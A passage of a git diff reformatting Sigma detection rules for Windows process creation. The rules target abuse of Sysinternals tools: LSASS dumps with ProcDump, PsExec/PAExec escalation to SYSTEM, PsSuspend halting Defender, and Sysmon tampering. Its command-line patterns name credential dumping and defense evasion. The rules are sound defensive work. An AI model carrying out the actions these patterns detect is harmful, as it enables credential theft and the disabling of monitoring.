@@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: svchost.exe - NewProcessName|endswith: \svchost.exe + CommandLine|endswith: svchost.exe + NewProcessName|endswith: \svchost.exe filter: - - ParentProcessName|endswith: - - \rpcnet.exe - - \rpcnetp.exe - - CommandLine: null + - ParentProcessName|endswith: + - \rpcnet.exe + - \rpcnetp.exe + - CommandLine: # no CommandLine value available condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml b/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml index 2d83ac55e..e4e012e5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml @@ -1,8 +1,7 @@ title: Terminal Service Process Spawn id: 1012f107-b8f1-4271-af30-5aed2de89b39 status: test -description: Detects a process spawned by the terminal service server process (this - could be an indicator for an exploitation of CVE-2019-0708) +description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) references: - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ author: Florian Roth (Nextron Systems) @@ -26,13 +25,13 @@ detection: - \svchost.exe - termsvcs filter_img: - NewProcessName|endswith: + NewProcessName|endswith: - \rdpclip.exe - :\Windows\System32\csrss.exe - :\Windows\System32\wininit.exe - :\Windows\System32\winlogon.exe filter_null: - NewProcessName: null + NewProcessName: condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml b/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml index 1d29ab363..fbdb19669 100644 --- a/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml @@ -16,7 +16,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \svchost.exe + NewProcessName|endswith: \svchost.exe filter_main_generic: ParentProcessName|endswith: - \Mrt.exe @@ -26,7 +26,7 @@ detection: - \services.exe - \TiWorker.exe filter_main_parent_null: - ParentProcessName: null + ParentProcessName: filter_main_parent_empty: ParentProcessName: - '-' diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml index d90ba8826..64549809f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml @@ -1,16 +1,13 @@ title: Permission Check Via Accesschk.EXE id: c625d754-6a3d-4f65-9c9a-536aea960d37 status: test -description: Detects the usage of the "Accesschk" utility, an access and privilege - audit tool developed by SysInternal and often being abused by attacker to verify - process privileges +description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43 - https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat -author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/13 modified: 2023/02/20 tags: @@ -24,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - Product|endswith: AccessChk - - Description|contains: Reports effective permissions - - NewProcessName|endswith: - - \accesschk.exe - - \accesschk64.exe - - OriginalFileName: accesschk.exe + - Product|endswith: AccessChk + - Description|contains: Reports effective permissions + - NewProcessName|endswith: + - \accesschk.exe + - \accesschk64.exe + - OriginalFileName: accesschk.exe selection_cli: - CommandLine|contains: + CommandLine|contains: # These are the most common flags used with this tool. You could add other combinations if needed - 'uwcqv ' - 'kwsu ' - 'qwsu ' diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml index 1d798364d..8662a7354 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml @@ -1,11 +1,10 @@ title: Active Directory Database Snapshot Via ADExplorer id: 9212f354-7775-4e28-9c9f-8f0a4544e664 related: - - id: ef61af62-bc74-4f58-b49b-626448227652 - type: derived + - id: ef61af62-bc74-4f58-b49b-626448227652 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - NewProcessName|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_cli: - CommandLine|contains: snapshot + CommandLine|contains: snapshot condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml index 9ecbf610e..5230de3e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml @@ -1,12 +1,10 @@ title: Suspicious Active Directory Database Snapshot Via ADExplorer id: ef61af62-bc74-4f58-b49b-626448227652 related: - - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 - type: derived + - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database to a suspicious - directory. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) @@ -23,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - NewProcessName|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_flag: - CommandLine|contains: snapshot + CommandLine|contains: snapshot selection_paths: - CommandLine|contains: + CommandLine|contains: + # TODO: Add more suspicious paths - \Downloads\ - \Users\Public\ - \AppData\ diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml index 14d5d60d2..eb05f5d9f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml @@ -1,11 +1,10 @@ title: Potential Execution of Sysinternals Tools id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived status: test -description: Detects command lines that contain the 'accepteula' flag which could - be a sign of execution of one of the Sysinternals tools +description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -accepteula' - ' /accepteula' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml index 9c21d6efe..2399be169 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml @@ -16,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - NewProcessName|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe condition: process_creation and selection falsepositives: - Administration and debugging activity (must be investigated) diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml index 8eab07786..bc668c586 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml @@ -1,8 +1,7 @@ title: Kernel Memory Dump Via LiveKD id: c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2 status: experimental -description: Detects execution of LiveKD with the "-m" flag to potentially dump the - kernel memory +description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory references: - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd - https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/ @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - NewProcessName|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /m' - ' -m' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml index beb6ac757..cf9b65e5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \procdump.exe - \procdump64.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml index f2ebc6d42..1715fc2b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml @@ -1,8 +1,7 @@ title: Potential SysInternals ProcDump Evasion id: 79b06761-465f-4f88-9ef2-150e24d3d737 status: test -description: Detects uses of the SysInternals ProcDump utility in which ProcDump or - its output get renamed, or a dump file is moved or copied to a different name +description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name references: - https://twitter.com/mrd0x/status/1480785527901204481 author: Florian Roth (Nextron Systems) @@ -20,24 +19,23 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - copy procdump - move procdump selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '.dmp ' - CommandLine|contains: + CommandLine|contains: - 2.dmp - lsass - out.dmp selection_3: - CommandLine|contains: - - copy lsass.exe_ - - move lsass.exe_ + CommandLine|contains: + - copy lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp + - move lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp condition: process_creation and (1 of selection_*) falsepositives: - - False positives are expected in cases in which ProcDump just gets copied to - a different directory without any renaming + - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml index c6b6daf4d..49f0c441d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml @@ -1,13 +1,9 @@ title: Potential LSASS Process Dump Via Procdump id: 5afee48e-67dd-4e03-a783-f74259dcf998 status: stable -description: 'Detects suspicious uses of the SysInternals Procdump utility by using - a special command line parameter in combination with the lsass.exe process. - - This way we are also able to catch cases in which the attacker has renamed the - procdump executable. - - ' +description: | + Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. + This way we are also able to catch cases in which the attacker has renamed the procdump executable. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -27,11 +23,11 @@ detection: EventID: 4688 Channel: Security selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_process: - CommandLine|contains: ' ls' + CommandLine|contains: ' ls' # Short for lsass condition: process_creation and (all of selection*) falsepositives: - Unlikely, because no one should dump an lsass process memory diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml index 0194ffbaa..1d237ac50 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \psexec.exe - - OriginalFileName: psexec.c + - NewProcessName|endswith: \psexec.exe + - OriginalFileName: psexec.c condition: process_creation and selection falsepositives: - Administrative scripts. diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml index de6896bb5..9fbc32e57 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml @@ -1,11 +1,10 @@ title: PsExec/PAExec Escalation to LOCAL SYSTEM id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 related: - - id: 207b0396-3689-42d9-8399-4222658efc99 - type: similar + - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags + type: similar status: test -description: Detects suspicious commandline flags used by PsExec and PAExec to escalate - a command line to LOCAL_SYSTEM rights +description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -23,8 +22,12 @@ detection: process_creation: EventID: 4688 Channel: Security - selection_sys: - CommandLine|contains: + selection_sys: # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' @@ -35,6 +38,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -45,6 +49,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' @@ -56,15 +61,13 @@ detection: - ' -i /s powershell' - ' /i -s powershell' selection_other: - CommandLine|contains: + CommandLine|contains: - psexec - paexec - accepteula condition: process_creation and (all of selection_*) falsepositives: - - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance - purposes (rare) - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml index cd1a3a609..618d44367 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml @@ -1,8 +1,7 @@ title: Potential PsExec Remote Execution id: ea011323-7045-460b-b2d7-0f7442ea6b38 status: test -description: Detects potential psexec command that initiate execution on a remote - systems via common commandline flags used by the utility +description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -20,7 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # Accepting EULA in commandline - often used in automated attacks + CommandLine|contains|all: - accepteula - ' -u ' - ' -p ' diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml index 0290e17d3..1d5b37c52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml @@ -1,11 +1,10 @@ title: PsExec Service Execution id: fdfcbd78-48f1-4a4b-90ac-d82241e368c5 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: obsoletes + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: obsoletes status: test -description: Detects launch of the PSEXESVC service, which means that this system - was the target of a psexec remote execution +description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.youtube.com/watch?v=ro2QuZTIMBM @@ -22,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName: C:\Windows\PSEXESVC.exe - - OriginalFileName: psexesvc.exe + - NewProcessName: C:\Windows\PSEXESVC.exe + - OriginalFileName: psexesvc.exe condition: process_creation and selection falsepositives: - Legitimate administrative tasks diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml index c50042ef9..eeed7739f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml @@ -1,13 +1,10 @@ title: PsExec Service Child Process Execution as LOCAL SYSTEM id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: similar + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: similar status: test -description: Detects suspicious launch of the PSEXESVC service on this system and - a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started - a command on this system running it with highest privileges and not only the privileges - of the login user account (e.g. the administrator account) +description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec author: Florian Roth (Nextron Systems) @@ -24,12 +21,11 @@ detection: Channel: Security selection: ParentProcessName: C:\Windows\PSEXESVC.exe - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection falsepositives: - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml index f57606d1d..3227e2c1a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml @@ -1,8 +1,7 @@ title: Suspicious Use of PsLogList id: aae1243f-d8af-40d8-ab20-33fc6d0c55bc status: test -description: Detects usage of the PsLogList utility to dump event log in order to - extract admin accounts and perform account discovery or delete events logs +description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs references: - https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos @@ -24,26 +23,26 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: psloglist.exe - - NewProcessName|endswith: - - \psloglist.exe - - \psloglist64.exe + - OriginalFileName: psloglist.exe + - NewProcessName|endswith: + - \psloglist.exe + - \psloglist64.exe selection_cli_eventlog: - CommandLine|contains: + CommandLine|contains: - ' security' - ' application' - ' system' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -d' - ' /d' - ' -x' - ' /x' - ' -s' - ' /s' - - ' -c' + - ' -c' # Clear event log after displaying - ' /c' - - ' -g' + - ' -g' # Export an event log as an evt file. - ' /g' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml index f154aeff3..46d7bb769 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml @@ -1,8 +1,7 @@ title: Sysinternals PsService Execution id: 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f status: test -description: Detects usage of Sysinternals PsService which can be abused for service - reconnaissance and tampering +description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psservice author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: psservice.exe - - NewProcessName|endswith: - - \PsService.exe - - \PsService64.exe + - OriginalFileName: psservice.exe + - NewProcessName|endswith: + - \PsService.exe + - \PsService64.exe condition: process_creation and selection falsepositives: - Legitimate use of PsService by an administrator diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml index 06a46ea78..1c408ed51 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml @@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Execution id: 48bbc537-b652-4b4e-bd1d-281172df448f related: - - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 - type: similar + - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 + type: similar status: experimental -description: Detects usage of Sysinternals PsSuspend which can be abused to suspend - critical processes +description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes references: - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: pssuspend.exe - - NewProcessName|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - NewProcessName|endswith: + - \pssuspend.exe + - \pssuspend64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml index 46d4f82d5..26bef003d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml @@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Suspicious Execution id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 related: - - id: 48bbc537-b652-4b4e-bd1d-281172df448f - type: similar + - id: 48bbc537-b652-4b4e-bd1d-281172df448f # Basic Execution + type: similar status: experimental -description: Detects suspicious execution of Sysinternals PsSuspend, where the utility - is used to suspend critical processes such as AV or EDR to bypass defenses +description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses references: - https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 @@ -22,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: pssuspend.exe - - NewProcessName|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - NewProcessName|endswith: + - \pssuspend.exe + - \pssuspend64.exe selection_cli: - CommandLine|contains: msmpeng.exe + # Add more interesting/critical processes + CommandLine|contains: msmpeng.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml index e654bfbe9..307b0aa3a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml @@ -1,11 +1,10 @@ title: Potential Privilege Escalation To LOCAL SYSTEM id: 207b0396-3689-42d9-8399-4222658efc99 related: - - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 - type: similar + - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 # PsExec specific rule + type: similar status: test -description: Detects unknown program using commandline flags usually used by tools - such as PsExec and PAExec to start programs with SYSTEM Privileges +description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -24,7 +23,12 @@ detection: EventID: 4688 Channel: Security selection_flags_1: - CommandLine|contains: + # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' @@ -35,6 +39,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -45,6 +50,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' @@ -56,14 +62,14 @@ detection: - ' -i /s powershell' - ' /i -s powershell' filter: - CommandLine|contains: + # This filter exclude strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23 + CommandLine|contains: - paexec - PsExec - accepteula condition: process_creation and (1 of selection_flags_* and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PsExec/PAExec with their software and rename - it, so that it is less embarrassing + - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml index 4da86bd5d..410dd5aca 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml @@ -1,9 +1,7 @@ title: Sysmon Configuration Update id: 87911521-7098-470b-a459-9a57fc80bdfd status: test -description: Detects updates to Sysmon's configuration. Attackers might update or - replace the Sysmon configuration with a bare bone one to avoid monitoring without - shutting down the service completely +description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely references: - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: - - \Sysmon64.exe - - \Sysmon.exe - - Description: System activity monitor + - NewProcessName|endswith: + - \Sysmon64.exe + - \Sysmon.exe + - Description: System activity monitor selection_cli: - CommandLine|contains: + CommandLine|contains: - -c - /c condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml index a0d34380e..467c26d60 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml @@ -1,8 +1,7 @@ title: Uninstall Sysinternals Sysmon id: 6a5f68d1-c4b5-46b9-94ee-5324892ea939 status: test -description: Detects the removal of Sysmon, which could be a potential attempt at - defense evasion +description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion references: - 